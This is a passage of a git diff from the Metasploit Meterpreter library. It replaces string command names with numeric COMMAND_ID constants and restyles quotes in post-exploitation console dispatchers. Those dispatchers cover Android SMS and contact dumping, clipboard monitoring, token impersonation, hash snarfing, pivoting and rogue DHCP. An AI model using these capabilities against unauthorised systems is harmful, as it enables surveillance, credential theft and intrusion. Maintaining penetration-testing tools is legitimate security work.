@@ -683,7 +189,7 @@ def inspect
       when PACKET_TYPE_REQUEST; "Request"
       when PACKET_TYPE_RESPONSE; "Response"
       when TLV_TYPE_REQUEST_ID; "REQUEST-ID"
-      when TLV_TYPE_METHOD; "METHOD"
+      when TLV_TYPE_COMMAND_ID; "COMMAND-ID"
       when TLV_TYPE_RESULT; "RESULT"
       when TLV_TYPE_EXCEPTION; "EXCEPTION"
       when TLV_TYPE_STRING; "STRING"
@@ -768,9 +274,7 @@ def inspect
     else
       tlvs_inspect = "meta=#{meta.ljust 10} value=#{val}"
     end
-    extra = ''
-    extra += " method=#{self.method}" if self.class.to_s =~ /Packet/
-    "#<#{self.class} type=#{stype}#{extra} #{tlvs_inspect}>"
+    "#<#{self.class} type=#{stype} #{tlvs_inspect}>"
   end
 
   ##
@@ -1390,8 +894,7 @@ def xor_bytes(xor_key, bytes)
   # Checks to see if the packet is a response.
   #
   def response?
-    return ((self.type == PACKET_TYPE_RESPONSE) ||
-            (self.type == PACKET_TYPE_PLAIN_RESPONSE))
+    (self.type == PACKET_TYPE_RESPONSE || self.type == PACKET_TYPE_PLAIN_RESPONSE)
   end
 
   ##
@@ -1404,24 +907,21 @@ def response?
   # Checks to see if the packet's method is equal to the supplied method.
   #
   def method?(method)
-    method = Rex::Post::Meterpreter.method_string_to_command_id(method) if method.is_a?(String)
-    return (get_tlv_value(TLV_TYPE_METHOD) == method)
+    (get_tlv_value(TLV_TYPE_COMMAND_ID) == method)
   end
 
   #
   # Sets the packet's method TLV to the method supplied.
   #
   def method=(method)
-    method = Rex::Post::Meterpreter.method_string_to_command_id(method) if method.is_a?(String)
-    add_tlv(TLV_TYPE_METHOD, method, true)
+    add_tlv(TLV_TYPE_COMMAND_ID, method, true)
   end
 
   #
   # Returns the value of the packet's method TLV.
   #
   def method
-    method = get_tlv_value(TLV_TYPE_METHOD)
-    return Rex::Post::Meterpreter.command_id_to_method_string(method)
+    get_tlv_value(TLV_TYPE_COMMAND_ID)
   end
 
   #
@@ -1429,7 +929,7 @@ def method
   # result.
   #
   def result?(result)
-    return (get_tlv_value(TLV_TYPE_RESULT) == result)
+    (get_tlv_value(TLV_TYPE_RESULT) == result)
   end
 
   #
@@ -1443,14 +943,14 @@ def result=(result)
   # Gets the value of the packet's result TLV.
   #
   def result
-    return get_tlv_value(TLV_TYPE_RESULT)
+    get_tlv_value(TLV_TYPE_RESULT)
   end
 
   #
   # Gets the value of the packet's request identifier TLV.
   #
   def rid
-    return get_tlv_value(TLV_TYPE_REQUEST_ID)
+    get_tlv_value(TLV_TYPE_REQUEST_ID)
   end
 end
 
diff --git a/lib/rex/post/meterpreter/packet_dispatcher.rb b/lib/rex/post/meterpreter/packet_dispatcher.rb
index 46e226962d910..c37c5fdd12ee1 100644
--- a/lib/rex/post/meterpreter/packet_dispatcher.rb
+++ b/lib/rex/post/meterpreter/packet_dispatcher.rb
@@ -246,7 +246,7 @@ def keepalive
         self.alive = false
       end
     else
-      pkt = Packet.create_request('core_channel_eof')
+      pkt = Packet.create_request(COMMAND_ID_CORE_CHANNEL_EOF)
       pkt.add_tlv(TLV_TYPE_CHANNEL_ID, 0)
       add_response_waiter(pkt, Proc.new { @ping_sent = false })
       send_packet(pkt)
diff --git a/lib/rex/post/meterpreter/pivot.rb b/lib/rex/post/meterpreter/pivot.rb
index ab6abffd1008e..a63a391c02c7f 100644
--- a/lib/rex/post/meterpreter/pivot.rb
+++ b/lib/rex/post/meterpreter/pivot.rb
@@ -46,12 +46,12 @@ class << self
     # to the appropriate class instance's DIO handler
     def request_handler(client, packet)
       handled = false
-      if packet.method == 'core_pivot_session_new'
+      if packet.method == COMMAND_ID_CORE_PIVOT_SESSION_NEW
         handled = true
         session_guid = packet.get_tlv_value(TLV_TYPE_SESSION_GUID)
         listener_id = packet.get_tlv_value(TLV_TYPE_PIVOT_ID)
         client.add_pivot_session(Pivot.new(client, session_guid, listener_id))
-      elsif packet.method == 'core_pivot_session_died'
+      elsif packet.method == COMMAND_ID_CORE_PIVOT_SESSION_DIED
         handled = true
         session_guid = packet.get_tlv_value(TLV_TYPE_SESSION_GUID)
         pivot = client.find_pivot_session(session_guid)
@@ -70,7 +70,7 @@ def Pivot.get_listeners(client)
 
   def Pivot.remove_listener(client, listener_id)
     if client.find_pivot_listener(listener_id)
-      request = Packet.create_request('core_pivot_remove')
+      request = Packet.create_request(COMMAND_ID_CORE_PIVOT_REMOVE)
       request.add_tlv(TLV_TYPE_PIVOT_ID, listener_id)
       client.send_request(request)
       client.remove_pivot_listener(listener_id)
@@ -78,7 +78,7 @@ def Pivot.remove_listener(client, listener_id)
   end
 
   def Pivot.create_named_pipe_listener(client, opts={})
-    request = Packet.create_request('core_pivot_add')
+    request = Packet.create_request(COMMAND_ID_CORE_PIVOT_ADD)
     request.add_tlv(TLV_TYPE_PIVOT_NAMED_PIPE_NAME, opts[:pipe_name])
 
     # TODO: use the framework to generate the whole lot, including a session type
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb
index 488a974e022e6..3b2c020b0d5bd 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb
@@ -37,20 +37,20 @@ def commands
       'wakelock'          => 'Enable/Disable Wakelock',
     }
     reqs = {
-      'dump_sms'         => ['android_dump_sms'],
-      'dump_contacts'    => ['android_dump_contacts'],
-      'geolocate'        => ['android_geolocate'],
-      'dump_calllog'     => ['android_dump_calllog'],
-      'check_root'       => ['android_check_root'],
-      'device_shutdown'  => ['android_device_shutdown'],
-      'send_sms'         => ['android_send_sms'],
-      'wlan_geolocate'   => ['android_wlan_geolocate'],
-      'interval_collect' => ['android_interval_collect'],
-      'activity_start'   => ['android_activity_start'],
-      'hide_app_icon'    => ['android_hide_app_icon'],
-      'sqlite_query'     => ['android_sqlite_query'],
-      'set_audio_mode'   => ['android_set_audio_mode'],
-      'wakelock'         => ['android_wakelock'],
+      'dump_sms'         => [COMMAND_ID_ANDROID_DUMP_SMS],
+      'dump_contacts'    => [COMMAND_ID_ANDROID_DUMP_CONTACTS],
+      'geolocate'        => [COMMAND_ID_ANDROID_GEOLOCATE],
+      'dump_calllog'     => [COMMAND_ID_ANDROID_DUMP_CALLLOG],
+      'check_root'       => [COMMAND_ID_ANDROID_CHECK_ROOT],
+      'device_shutdown'  => [COMMAND_ID_ANDROID_DEVICE_SHUTDOWN],
+      'send_sms'         => [COMMAND_ID_ANDROID_SEND_SMS],
+      'wlan_geolocate'   => [COMMAND_ID_ANDROID_WLAN_GEOLOCATE],
+      'interval_collect' => [COMMAND_ID_ANDROID_INTERVAL_COLLECT],
+      'activity_start'   => [COMMAND_ID_ANDROID_ACTIVITY_START],
+      'hide_app_icon'    => [COMMAND_ID_ANDROID_HIDE_APP_ICON],
+      'sqlite_query'     => [COMMAND_ID_ANDROID_SQLITE_QUERY],
+      'set_audio_mode'   => [COMMAND_ID_ANDROID_SET_AUDIO_MODE],
+      'wakelock'         => [COMMAND_ID_ANDROID_WAKELOCK],
     }
     filter_commands(all, reqs)
   end
@@ -94,7 +94,7 @@ def cmd_interval_collect(*args)
         return
       end
 
-      type = args.shift.downcase
+      args.shift.downcase
 
       unless client.android.collect_types.include?(opts[:type])
         interval_collect_usage
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/appapi.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/appapi.rb
index 131b90381d20c..e9dcd629a59ec 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/appapi.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/appapi.rb
@@ -20,16 +20,16 @@ class Console::CommandDispatcher::AppApi
   #
   def commands
     all = {
-      "app_list"      => "List installed apps in the device",
-      "app_run"       => "Start Main Activty for package name",
-      "app_install"   => "Request to install apk file",
-      "app_uninstall" => "Request to uninstall application"
+      'app_list'      => 'List installed apps in the device',
+      'app_run'       => 'Start Main Activty for package name',
+      'app_install'   => 'Request to install apk file',
+      'app_uninstall' => 'Request to uninstall application'
     }
     reqs = {
-      "app_list"      => [ "appapi_app_list" ],
-      "app_run"       => [ "appapi_app_run" ],
-      "app_install"   => [ "appapi_app_install" ],
-      "app_uninstall" => [ "appapi_app_uninstall" ]
+      'app_list'      => [COMMAND_ID_APPAPI_APP_LIST],
+      'app_run'       => [COMMAND_ID_APPAPI_APP_RUN],
+      'app_install'   => [COMMAND_ID_APPAPI_APP_INSTALL],
+      'app_uninstall' => [COMMAND_ID_APPAPI_APP_UNINSTALL]
     }
     filter_commands(all, reqs)
   end
@@ -38,7 +38,7 @@ def commands
   # Name for this dispatcher
   #
   def name
-    "Application Controller"
+    'Application Controller'
   end
 
   #
@@ -46,9 +46,9 @@ def name
   #
   def cmd_app_list(*args)
     app_list_opts = Rex::Parser::Arguments.new(
-      "-h" => [ false, "Help Banner" ],
-      "-u" => [ false,  "Get User apps ONLY" ],
-      "-s" => [ false,  "Get System apps ONLY" ]
+      '-h' => [false, 'Help Banner'],
+      '-u' => [false, 'Get User apps ONLY'],
+      '-s' => [false, 'Get System apps ONLY']
     )
 
     ret = []
@@ -56,14 +56,14 @@ def cmd_app_list(*args)
 
     app_list_opts.parse(args) do |opt, _idx, val|
       case opt
-      when "-h"
-        print_line("Usage: app_list [options]")
-        print_line("List the installed applications.")
+      when '-h'
+        print_line('Usage: app_list [options]')
+        print_line('List the installed applications.')
         print_line(app_list_opts.usage)
         return
-      when "-u"
+      when '-u'
         init = 1
-      when "-s"
+      when '-s'
         init = 2
       end
     end
@@ -77,10 +77,10 @@ def cmd_app_list(*args)
   #
   def cmd_app_uninstall(*args)
     if (args.length < 1)
-      print_error("[-] Usage: app_uninstall <packagename>")
-      print_error("[-] Request to uninstall application.")
-      print_error("[-] You can use 'app_list' to pick your packagename.")
-      print_status("ex. app_uninstall com.corrm.clac")
+      print_error('[-] Usage: app_uninstall <packagename>')
+      print_error('[-] Request to uninstall application.')
+      print_error('[-] You can use "app_list" to pick your packagename.')
+      print_status('eg. app_uninstall com.corrm.clac')
       return
     end
 
@@ -89,9 +89,9 @@ def cmd_app_uninstall(*args)
     # Send uninstall request
     case client.appapi.app_uninstall(package_name)
     when 1
-      print_good("Request Done.")
+      print_good('Request Done.')
     when 2
-      print_error("File Not Found.")
+      print_error('File Not Found.')
     when 11
       print_error("package '#{package_name}' not found.")
     end
@@ -102,9 +102,9 @@ def cmd_app_uninstall(*args)
   #
   def cmd_app_install(*args)
     if (args.length < 1)
-      print_error("[-] Usage: app_install <filepath>")
-      print_error("[-] Request to install application.")
-      print_status("ex. app_install '/sdcard/Download/corrm.apk'")
+      print_error('[-] Usage: app_install <filepath>')
+      print_error('[-] Request to install application.')
+      print_status('eg. app_install "/sdcard/Download/corrm.apk"')
       return
     end
 
@@ -113,11 +113,11 @@ def cmd_app_install(*args)
     # Send install request
     case client.appapi.app_install(full_path)
     when 1
-      print_good("Request Done.")
+      print_good('Request Done.')
     when 2
-      print_error("File Not Found.")
+      print_error('File Not Found.')
     when 3
-      print_error("Root access rejected.")
+      print_error('Root access rejected.')
     end
   end
 
@@ -126,10 +126,10 @@ def cmd_app_install(*args)
   #
   def cmd_app_run(*args)
     if (args.length < 1)
-      print_error("[-] Usage: app_run <package_name>")
-      print_error("[-] Start Main Activty for package name.")
-      print_error("[-] You can use 'app_list' to pick your packagename.")
-      print_status("ex. app_run com.corrm.clac")
+      print_error('[-] Usage: app_run <package_name>')
+      print_error('[-] Start Main Activty for package name.')
+      print_error('[-] You can use "app_list" to pick your packagename.')
+      print_status('eg. app_run com.corrm.clac')
       return
     end
 
@@ -147,7 +147,7 @@ def cmd_app_run(*args)
   # Function to help printing list of informations
   #
   def to_table(data)
-    column_headers = [ "Name", "Package", "Running", "IsSystem" ]
+    column_headers = ['Name', 'Package', 'Running', 'IsSystem']
 
     opts = {
       'Header' => 'Application List',
@@ -158,9 +158,9 @@ def to_table(data)
     tbl = Rex::Text::Table.new(opts)
     (0 ... data.length).step(4).each do |index|
       tbl << [data[index],
-        (data[index + 1] == nil ? "" : data[index + 1]),
-        (data[index + 2] == nil ? "" : data[index + 2]),
-        (data[index + 3] == nil ? "" : data[index + 3])]
+        (data[index + 1] == nil ? '' : data[index + 1]),
+        (data[index + 2] == nil ? '' : data[index + 2]),
+        (data[index + 3] == nil ? '' : data[index + 3])]
     end
 
     tbl
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/espia.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/espia.rb
index b2efb5f01e94e..85cf9eb02f701 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/espia.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/espia.rb
@@ -29,8 +29,6 @@ def initialize(shell)
   #
   def commands
     {
-  #		"dev_image"  => "Attempt to grab a frame from webcam",
-  #		"dev_audio"  => "Attempt to record microphone audio",
       "screengrab" => "Attempt to grab screen shot from process's active desktop"
     }
   end
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi.rb
index 326c837d3fedf..42d8278ab4c9a 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi.rb
@@ -54,7 +54,7 @@ def commands
   # Name for this dispatcher
   #
   def name
-    "Extended API Extension"
+    'Extended API Extension'
   end
 
 end
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/adsi.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/adsi.rb
index 1dcbcd47e578c..d5a033673c663 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/adsi.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/adsi.rb
@@ -34,12 +34,12 @@ def commands
       'adsi_domain_query'           => 'Enumerate all objects on the specified domain that match a filter.'
     }
     reqs = {
-      "adsi_user_enum"              => [ "extapi_adsi_domain_query" ],
-      "adsi_group_enum"             => [ "extapi_adsi_domain_query" ],
-      "adsi_nested_group_user_enum" => [ "extapi_adsi_domain_query" ],
-      "adsi_computer_enum"          => [ "extapi_adsi_domain_query" ],
-      "adsi_dc_enum"                => [ "extapi_adsi_domain_query" ],
-      "adsi_domain_query"           => [ "extapi_adsi_domain_query" ],
+      'adsi_user_enum'              => [COMMAND_ID_EXTAPI_ADSI_DOMAIN_QUERY],
+      'adsi_group_enum'             => [COMMAND_ID_EXTAPI_ADSI_DOMAIN_QUERY],
+      'adsi_nested_group_user_enum' => [COMMAND_ID_EXTAPI_ADSI_DOMAIN_QUERY],
+      'adsi_computer_enum'          => [COMMAND_ID_EXTAPI_ADSI_DOMAIN_QUERY],
+      'adsi_dc_enum'                => [COMMAND_ID_EXTAPI_ADSI_DOMAIN_QUERY],
+      'adsi_domain_query'           => [COMMAND_ID_EXTAPI_ADSI_DOMAIN_QUERY],
     }
     filter_commands(all, reqs)
   end
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/clipboard.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/clipboard.rb
index 511afb7489875..0c6bb159b83fb 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/clipboard.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/clipboard.rb
@@ -21,24 +21,24 @@ class Console::CommandDispatcher::Extapi::Clipboard
   #
   def commands
     all = {
-      "clipboard_get_data"       => "Read the target's current clipboard (text, files, images)",
-      "clipboard_set_text"       => "Write text to the target's clipboard",
-      "clipboard_monitor_start"  => "Start the clipboard monitor",
-      "clipboard_monitor_pause"  => "Pause the active clipboard monitor",
-      "clipboard_monitor_resume" => "Resume the paused clipboard monitor",
-      "clipboard_monitor_dump"   => "Dump all captured clipboard content",
-      "clipboard_monitor_purge"  => "Delete all captured clipboard content without dumping it",
-      "clipboard_monitor_stop"   => "Stop the clipboard monitor"
+      'clipboard_get_data'       => "Read the target's current clipboard (text, files, images)",
+      'clipboard_set_text'       => "Write text to the target's clipboard",
+      'clipboard_monitor_start'  => 'Start the clipboard monitor',
+      'clipboard_monitor_pause'  => 'Pause the active clipboard monitor',
+      'clipboard_monitor_resume' => 'Resume the paused clipboard monitor',
+      'clipboard_monitor_dump'   => 'Dump all captured clipboard content',
+      'clipboard_monitor_purge'  => 'Delete all captured clipboard content without dumping it',
+      'clipboard_monitor_stop'   => 'Stop the clipboard monitor'
     }
     reqs = {
-      "clipboard_get_data"       => [ "extapi_clipboard_get_data" ],
-      "clipboard_set_text"       => [ "extapi_clipboard_set_data" ],
-      "clipboard_monitor_start"  => [ "extapi_clipboard_monitor_start" ],
-      "clipboard_monitor_pause"  => [ "extapi_clipboard_monitor_pause" ],
-      "clipboard_monitor_resume" => [ "extapi_clipboard_monitor_resume" ],
-      "clipboard_monitor_dump"   => [ "extapi_clipboard_monitor_dump" ],
-      "clipboard_monitor_purge"  => [ "extapi_clipboard_monitor_purge" ],
-      "clipboard_monitor_stop"   => [ "extapi_clipboard_monitor_stop" ],
+      'clipboard_get_data'       => [COMMAND_ID_EXTAPI_CLIPBOARD_GET_DATA],
+      'clipboard_set_text'       => [COMMAND_ID_EXTAPI_CLIPBOARD_SET_DATA],
+      'clipboard_monitor_start'  => [COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_START],
+      'clipboard_monitor_pause'  => [COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_PAUSE],
+      'clipboard_monitor_resume' => [COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_RESUME],
+      'clipboard_monitor_dump'   => [COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_DUMP],
+      'clipboard_monitor_purge'  => [COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_PURGE],
+      'clipboard_monitor_stop'   => [COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_STOP],
     }
     filter_commands(all, reqs)
   end
@@ -47,7 +47,7 @@ def commands
   # Name for this dispatcher
   #
   def name
-    "Extapi: Clipboard Management"
+    'Extapi: Clipboard Management'
   end
 
   #
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/service.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/service.rb
index 9b4de4032b3f7..ba5c600024b53 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/service.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/service.rb
@@ -22,14 +22,14 @@ class Console::CommandDispatcher::Extapi::Service
   #
   def commands
     all = {
-      "service_enum"    => "Enumerate all registered Windows services",
-      "service_query"   => "Query more detail about a specific Windows service",
-      "service_control" => "Control a single service (start/pause/resume/stop/restart)"
+      'service_enum'    => 'Enumerate all registered Windows services',
+      'service_query'   => 'Query more detail about a specific Windows service',
+      'service_control' => 'Control a single service (start/pause/resume/stop/restart)'
     }
     reqs = {
-      "service_enum"    => [ "extapi_service_enum" ],
-      "service_query"   => [ "extapi_service_query" ],
-      "service_control" => [ "extapi_service_control" ],
+      'service_enum'    => [COMMAND_ID_EXTAPI_SERVICE_ENUM],
+      'service_query'   => [COMMAND_ID_EXTAPI_SERVICE_QUERY],
+      'service_control' => [COMMAND_ID_EXTAPI_SERVICE_CONTROL],
     }
     filter_commands(all, reqs)
   end
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/window.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/window.rb
index 2cdf06abafe77..1dfab3938d441 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/window.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/window.rb
@@ -3,132 +3,133 @@
 require 'rex/post/meterpreter'
 
 module Rex
-  module Post
-    module Meterpreter
-      module Ui
-        ###
-        #
-        # Extended API window management user interface.
-        #
-        ###
-        class Console::CommandDispatcher::Extapi::Window
-
-          Klass = Console::CommandDispatcher::Extapi::Window
-
-          include Console::CommandDispatcher
-
-          #
-          # List of supported commands.
-          #
-          def commands
-            all = {
-              'window_enum' => 'Enumerate all current open windows'
-            }
-            reqs = {
-              'window_enum' => [ 'extapi_window_enum' ]
-            }
-            filter_commands(all, reqs)
-          end
-
-          #
-          # Name for this dispatcher
-          #
-          def name
-            'Extapi: Window Management'
-          end
-
-          #
-          # Options for the window_enum command.
-          #
-          @@window_enum_opts = Rex::Parser::Arguments.new(
-            '-h' => [ false, 'Help banner' ],
-            '-p' => [ true, 'Parent window handle, used to enumerate child windows' ],
-            '-u' => [ false, 'Include unknown/untitled windows in the result set' ],
-            '-c' => [ true, 'Specify the window class name to display. e.g. Edit,Button etc.' ]
-          )
-
-          def window_enum_usage
-            print(
-              "\nUsage: window_enum [-h] [-p parent_window] [-u]\n\n" \
-              "Enumerate the windows on the target.\n\n" \
-              "Enumeration returns the Process ID and Window Handle for each window\n" \
-              "found. The Window Handle can be used for further calls to window_enum\n" \
-              "or the railgun API.\n" +
-              @@window_enum_opts.usage +
-              "Note: Not all windows can be enumerated. An attempt to enumerate\n" \
-              "      the children of such a window will result in a failure with the\n" \
-              "      message \"Operation failed: The parameter is incorrect.\"\n"\
-              "      Enumerable maximum text length is 256.\n\n"
-            )
-          end
-
-          #
-          # Enumerate top-level windows.
-          #
-          def cmd_window_enum(*args)
-            parent_window = nil
-            include_unknown = false
-            window_class_name = nil
-
-            @@window_enum_opts.parse(args) do |opt, _idx, val|
-              case opt
-              when '-u'
-                include_unknown = true
-              when '-p'
-                parent_window = val.to_i
-                if parent_window == 0
-                  window_enum_usage
-                  return true
-                end
-              when '-h'
-                window_enum_usage
-                return true
-              when '-c'
-                window_class_name = val.to_s
-                if window_class_name == ''
-                  window_enum_usage
-                  return true
-                end
-              end
-            end
-
-            windows = client.extapi.window.enumerate(include_unknown, parent_window)
-
-            header = parent_window ? "Child windows of #{parent_window}" : 'Top-level windows'
-            columns = [ 'PID', 'Handle', 'ClassName', 'Title']
-            table = Rex::Text::Table.new(
-              'Header' => header,
-              'Indent' => 0,
-              'SortIndex' => columns.index('Handle'),
-              'Columns' => columns
-            )
-
-            windows.each do |w|
-              if window_class_name.nil?
-                table << [w[:pid], w[:handle], w[:class_name], w[:title]]
-              elsif (w[:class_name] == window_class_name)
-                table << [w[:pid], w[:handle], w[:class_name], w[:title]]
-              else
-                next
-              end
-            end
-
-            print_line
-            print_line(table.to_s)
-
-            if parent_window.nil?
-              print_line("Total top-level Windows: #{windows.length}")
-            else
-              print_line("Total child Windows: #{windows.length}")
-            end
-
-            print_line
-
-            return true
-          end
+module Post
+module Meterpreter
+module Ui
+
+###
+#
+# Extended API window management user interface.
+#
+###
+class Console::CommandDispatcher::Extapi::Window
+
+  Klass = Console::CommandDispatcher::Extapi::Window
+
+  include Console::CommandDispatcher
+
+  #
+  # List of supported commands.
+  #
+  def commands
+    all = {
+      'window_enum' => 'Enumerate all current open windows'
+    }
+    reqs = {
+      'window_enum' => [COMMAND_ID_EXTAPI_WINDOW_ENUM]
+    }
+    filter_commands(all, reqs)
+  end
+
+  #
+  # Name for this dispatcher
+  #
+  def name
+    'Extapi: Window Management'
+  end
+
+  #
+  # Options for the window_enum command.
+  #
+  @@window_enum_opts = Rex::Parser::Arguments.new(
+    '-h' => [ false, 'Help banner' ],
+    '-p' => [ true, 'Parent window handle, used to enumerate child windows' ],
+    '-u' => [ false, 'Include unknown/untitled windows in the result set' ],
+    '-c' => [ true, 'Specify the window class name to display. e.g. Edit,Button etc.' ]
+  )
+
+  def window_enum_usage
+    print(
+      "\nUsage: window_enum [-h] [-p parent_window] [-u]\n\n" \
+      "Enumerate the windows on the target.\n\n" \
+      "Enumeration returns the Process ID and Window Handle for each window\n" \
+      "found. The Window Handle can be used for further calls to window_enum\n" \
+      "or the railgun API.\n" +
+      @@window_enum_opts.usage +
+      "Note: Not all windows can be enumerated. An attempt to enumerate\n" \
+      "      the children of such a window will result in a failure with the\n" \
+      "      message \"Operation failed: The parameter is incorrect.\"\n"\
+      "      Enumerable maximum text length is 256.\n\n"
+    )
+  end
 
+  #
+  # Enumerate top-level windows.
+  #
+  def cmd_window_enum(*args)
+    parent_window = nil
+    include_unknown = false
+    window_class_name = nil
+
+    @@window_enum_opts.parse(args) do |opt, _idx, val|
+      case opt
+      when '-u'
+        include_unknown = true
+      when '-p'
+        parent_window = val.to_i
+        if parent_window == 0
+          window_enum_usage
+          return true
+        end
+      when '-h'
+        window_enum_usage
+        return true
+      when '-c'
+        window_class_name = val.to_s
+        if window_class_name == ''
+          window_enum_usage
+          return true
         end
       end
     end
+
+    windows = client.extapi.window.enumerate(include_unknown, parent_window)
+
+    header = parent_window ? "Child windows of #{parent_window}" : 'Top-level windows'
+    columns = [ 'PID', 'Handle', 'ClassName', 'Title']
+    table = Rex::Text::Table.new(
+      'Header' => header,
+      'Indent' => 0,
+      'SortIndex' => columns.index('Handle'),
+      'Columns' => columns
+    )
+
+    windows.each do |w|
+      if window_class_name.nil?
+        table << [w[:pid], w[:handle], w[:class_name], w[:title]]
+      elsif (w[:class_name] == window_class_name)
+        table << [w[:pid], w[:handle], w[:class_name], w[:title]]
+      else
+        next
+      end
+    end
+
+    print_line
+    print_line(table.to_s)
+
+    if parent_window.nil?
+      print_line("Total top-level Windows: #{windows.length}")
+    else
+      print_line("Total child Windows: #{windows.length}")
+    end
+
+    print_line
+
+    return true
   end
+
+end
+end
+end
+end
 end
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/wmi.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/wmi.rb
index 7b6c7f57a8744..f7159672a406f 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/wmi.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/wmi.rb
@@ -26,10 +26,10 @@ class Console::CommandDispatcher::Extapi::Wmi
   #
   def commands
     all = {
-      "wmi_query" => "Perform a generic WMI query and return the results",
+      'wmi_query' => 'Perform a generic WMI query and return the results',
     }
     reqs = {
-      "wmi_query" => [ "extapi_wmi_query" ],
+      'wmi_query' => [COMMAND_ID_EXTAPI_WMI_QUERY],
     }
     filter_commands(all, reqs)
   end
@@ -38,7 +38,7 @@ def commands
   # Name for this dispatcher
   #
   def name
-    "Extapi: WMI Querying"
+    'Extapi: WMI Querying'
   end
 
   #
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb
index 921d176e9a070..4a8af5f424c2e 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb
@@ -29,12 +29,12 @@ def initialize(shell)
   #
   def commands
     {
-      "add_user" => "Attempt to add a user with all tokens",
-      "add_localgroup_user" => "Attempt to add a user to a local group with all tokens",
-      "add_group_user" => "Attempt to add a user to a global group with all tokens",
-      "list_tokens" => "List tokens available under current user context",
-      "impersonate_token" => "Impersonate specified token",
-      "snarf_hashes" => "Snarf challenge/response hashes for every token"
+      'add_user'            => 'Attempt to add a user with all tokens',
+      'add_localgroup_user' => 'Attempt to add a user to a local group with all tokens',
+      'add_group_user'      => 'Attempt to add a user to a global group with all tokens',
+      'list_tokens'         => 'List tokens available under current user context',
+      'impersonate_token'   => 'Impersonate specified token',
+      'snarf_hashes'        => 'Snarf challenge/response hashes for every token'
     }
   end
 
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/lanattacks/dhcp.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/lanattacks/dhcp.rb
index bc6369800ef27..f0ccb91efb95e 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/lanattacks/dhcp.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/lanattacks/dhcp.rb
@@ -22,20 +22,20 @@ class Console::CommandDispatcher::Lanattacks::Dhcp
   #
   def commands
     all = {
-      "dhcp_start"        => "Start the DHCP server",
-      "dhcp_stop"         => "Stop the DHCP server",
-      "dhcp_reset"        => "Reset the DHCP server",
-      "dhcp_set_option"   => "Set a DHCP server option",
-      "dhcp_load_options" => "Load DHCP optionis from a datastore",
-      "dhcp_log"          => "Log DHCP server activity"
+      'dhcp_start'        => 'Start the DHCP server',
+      'dhcp_stop'         => 'Stop the DHCP server',
+      'dhcp_reset'        => 'Reset the DHCP server',
+      'dhcp_set_option'   => 'Set a DHCP server option',
+      'dhcp_load_options' => 'Load DHCP optionis from a datastore',
+      'dhcp_log'          => 'Log DHCP server activity'
     }
     reqs = {
-      "dhcp_start"        => [ "lanattacks_start_dhcp" ],
-      "dhcp_stop"         => [ "lanattacks_stop_dhcp" ],
-      "dhcp_reset"        => [ "lanattacks_reset_dhcp" ],
-      "dhcp_set_option"   => [ "lanattacks_set_dhcp_option" ],
-      "dhcp_load_options" => [ "lanattacks_set_dhcp_option" ],
-      "dhcp_log"          => [ "lanattacks_dhcp_log" ]
+      'dhcp_start'        => [COMMAND_ID_LANATTACKS_START_DHCP],
+      'dhcp_stop'         => [COMMAND_ID_LANATTACKS_STOP_DHCP],
+      'dhcp_reset'        => [COMMAND_ID_LANATTACKS_RESET_DHCP],
+      'dhcp_set_option'   => [COMMAND_ID_LANATTACKS_SET_DHCP_OPTION],
+      'dhcp_load_options' => [COMMAND_ID_LANATTACKS_SET_DHCP_OPTION],
+      'dhcp_log'          => [COMMAND_ID_LANATTACKS_DHCP_LOG]
     }
     filter_commands(all, reqs)
   end
